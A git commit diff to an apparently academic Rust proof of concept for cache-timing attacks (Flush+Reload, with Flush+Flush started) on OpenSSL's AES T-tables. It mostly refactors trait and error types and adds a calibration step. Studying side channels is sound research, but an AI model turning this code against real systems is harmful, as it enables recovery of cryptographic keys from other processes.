Get the foundation for optimized version using Flush and Flush

2020-08-19 14:34:52 +02:00 · 2020-08-19 14:34:52 +02:00 · 8683dfa732
commit 8683dfa732
parent 0819eef0c0
2 changed files with 101 additions and 40 deletions
--- a/aes-t-tables/src/lib.rs
+++ b/aes-t-tables/src/lib.rs
@ -1,3 +1,5 @@
+#![feature(specialization)]
+
 use openssl::aes;

 use crate::CacheStatus::Hit;
@ -31,16 +33,19 @@ use std::sync::Arc;

 // an attacker measurement
 // a calibration victim
-
 #[derive(Debug, PartialEq, Eq)]
 pub enum CacheStatus {
    Hit,
    Miss,
 }

-pub enum SideChannelError<T> {
+pub enum ChannelFatalError {
+    Oops,
+}
+
+pub enum SideChannelError {
    NeedRecalibration,
-    FatalError(T),
+    FatalError(ChannelFatalError),
 }

 /*
@ -57,54 +62,53 @@ pub trait SimpleCacheSideChannel {
 }

 pub trait TableCacheSideChannel {
-    type ChannelFatalError: Debug;
+    //type ChannelFatalError: Debug;
+    fn calibrate(&mut self, addresses: impl IntoIterator<Item = *const u8> + Clone);
    fn attack<'a, 'b, 'c>(
        &'a mut self,
-        addresses: impl IntoIterator<Item = *const u8>,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
        victim: &'c dyn Fn(),
-    ) -> Result<Vec<(*const u8, CacheStatus)>, Self::ChannelFatalError>;
+    ) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError>;
 }

 pub trait SingleAddrCacheSideChannel: Debug {
-    type ChannelFatalError: Debug;
+    //type SingleChannelFatalError: Debug;

-    fn test(
-        &mut self,
-        addr: *const u8,
-    ) -> Result<CacheStatus, SideChannelError<Self::ChannelFatalError>>;
+    fn test(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError>;
    fn prepare(&mut self, addr: *const u8);
    fn victim(&mut self, operation: &dyn Fn());
    fn calibrate(
        &mut self,
-        addresses: impl IntoIterator<Item = *const u8>,
-    ) -> Result<(), Self::ChannelFatalError>;
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError>;
 }

-/*
 pub trait MultipleAddrCacheSideChannel: Debug {
-    type ChannelFatalError: Debug;
-    fn test<'a>(
-        &self,
-        addresses: impl IntoIterator<Item = &'a *const u8>,
-    ) -> Result<Vec<CacheStatus>, SideChannelError<Self::ChannelFatalError>>;
-    fn prepare<'a>(addresses: impl IntoIterator<Item = &'a *const u8>);
-    fn victim<T>(&self, operation: Box<dyn FnOnce() -> T>) -> T;
-    fn recalibrate(self) -> Result<Self, Self::ChannelFatalError>;
-    fn calibrate<'a>(
-        params: Self::Params,
-        addresses: impl IntoIterator<Item = &'a *const u8>,
-    ) -> Result<Self, Self::ChannelFatalError>;
+    //type MultipleChannelFatalError: Debug;
+
+    fn test(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<Vec<(*const u8, CacheStatus)>, SideChannelError>;
+    fn prepare(&mut self, addresses: impl IntoIterator<Item = *const u8> + Clone);
+    fn victim(&mut self, operation: &dyn Fn());
+    fn calibrate(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError>;
 }
-*/

 impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel for T {
-    type ChannelFatalError = T::ChannelFatalError;
+    default fn calibrate(&mut self, addresses: impl IntoIterator<Item = *const u8> + Clone) {
+        self.calibrate(addresses);
+    }
+    //type ChannelFatalError = T::SingleChannelFatalError;

-    fn attack<'a, 'b, 'c>(
+    default fn attack<'a, 'b, 'c>(
        &'a mut self,
-        addresses: impl IntoIterator<Item = *const u8>,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
        victim: &'c dyn Fn(),
-    ) -> Result<Vec<(*const u8, CacheStatus)>, Self::ChannelFatalError> {
+    ) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError> {
        let mut result = Vec::new();

        for addr in addresses {
@ -127,6 +131,54 @@ impl<T: SingleAddrCacheSideChannel> TableCacheSideChannel for T {
    }
 }

+impl<T: MultipleAddrCacheSideChannel> SingleAddrCacheSideChannel for T {
+    //type SingleChannelFatalError = T::MultipleChannelFatalError;
+    fn test(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {
+        unimplemented!()
+    }
+
+    fn prepare(&mut self, addr: *const u8) {
+        unimplemented!()
+    }
+
+    fn victim(&mut self, operation: &dyn Fn()) {
+        unimplemented!()
+    }
+
+    fn calibrate(
+        &mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+    ) -> Result<(), ChannelFatalError> {
+        self.calibrate(addresses)
+    }
+}
+
+impl<T: MultipleAddrCacheSideChannel> TableCacheSideChannel for T {
+    fn calibrate(&mut self, addresses: impl IntoIterator<Item = *const u8> + Clone) {
+        self.calibrate(addresses);
+    }
+    //type ChannelFatalError = T::MultipleChannelFatalError;
+
+    fn attack<'a, 'b, 'c>(
+        &'a mut self,
+        addresses: impl IntoIterator<Item = *const u8> + Clone,
+        victim: &'c dyn Fn(),
+    ) -> Result<Vec<(*const u8, CacheStatus)>, ChannelFatalError> {
+        MultipleAddrCacheSideChannel::prepare(self, addresses.clone());
+        MultipleAddrCacheSideChannel::victim(self, victim);
+        let r = MultipleAddrCacheSideChannel::test(self, addresses); // Fixme error handling
+        match r {
+            Err(e) => match e {
+                SideChannelError::NeedRecalibration => {
+                    panic!();
+                }
+                SideChannelError::FatalError(e) => Err(e),
+            },
+            Ok(v) => Ok(v),
+        }
+    }
+}
+
 pub struct AESTTableParams<'a> {
    pub num_encryptions: u32,
    pub key: [u8; 32],
@ -167,6 +219,8 @@ pub fn attack_t_tables_poc(
        .flatten()
        .map(|offset| unsafe { base.offset(offset) });

+    side_channel.calibrate(addresses.clone());
+
    for addr in addresses.clone() {
        timings.insert(addr, HashMap::new());
    }
--- a/aes-t-tables/src/main.rs
+++ b/aes-t-tables/src/main.rs
@ -1,8 +1,10 @@
 use aes_t_tables::{
-    attack_t_tables_poc, AESTTableParams, CacheStatus, SideChannelError, SingleAddrCacheSideChannel,
+    attack_t_tables_poc, AESTTableParams, CacheStatus, ChannelFatalError, SideChannelError,
+    SingleAddrCacheSideChannel,
 };
 use cache_utils::calibration::only_reload;
 use cache_utils::{flush, rdtsc_fence};
+use std::collections::{HashMap, HashSet};
 use std::path::Path;

 #[derive(Debug)]
@ -21,12 +23,7 @@ impl NaiveFlushAndReload {
 }

 impl SingleAddrCacheSideChannel for NaiveFlushAndReload {
-    type ChannelFatalError = ();
-
-    fn test(
-        &mut self,
-        addr: *const u8,
-    ) -> Result<CacheStatus, SideChannelError<Self::ChannelFatalError>> {
+    fn test(&mut self, addr: *const u8) -> Result<CacheStatus, SideChannelError> {
        if self.current != Some(addr) {
            panic!(); // FIXME
        }
@ -45,7 +42,7 @@ impl SingleAddrCacheSideChannel for NaiveFlushAndReload {
    fn calibrate(
        &mut self,
        _addresses: impl IntoIterator<Item = *const u8>,
-    ) -> Result<(), Self::ChannelFatalError> {
+    ) -> Result<(), ChannelFatalError> {
        Ok(())
    }

@ -55,13 +52,23 @@ impl SingleAddrCacheSideChannel for NaiveFlushAndReload {
    }
 }

+type VPN = usize;
+type Slice = u8;
+
+struct FlushAndFlush {
+    thresholds: HashMap<VPN, HashMap<Slice, u64>>,
+    addresses_ready: HashSet<*const u8>,
+}
+
+impl FlushAndFlush {}
+
 fn main() {
    let open_sslpath = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so");
    let mut side_channel = NaiveFlushAndReload::from_threshold(200);
    attack_t_tables_poc(
        &mut side_channel,
        AESTTableParams {
-            num_encryptions: 10000,
+            num_encryptions: 1 << 14,
            key: [0; 32],
            te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order)
            openssl_path: &open_sslpath,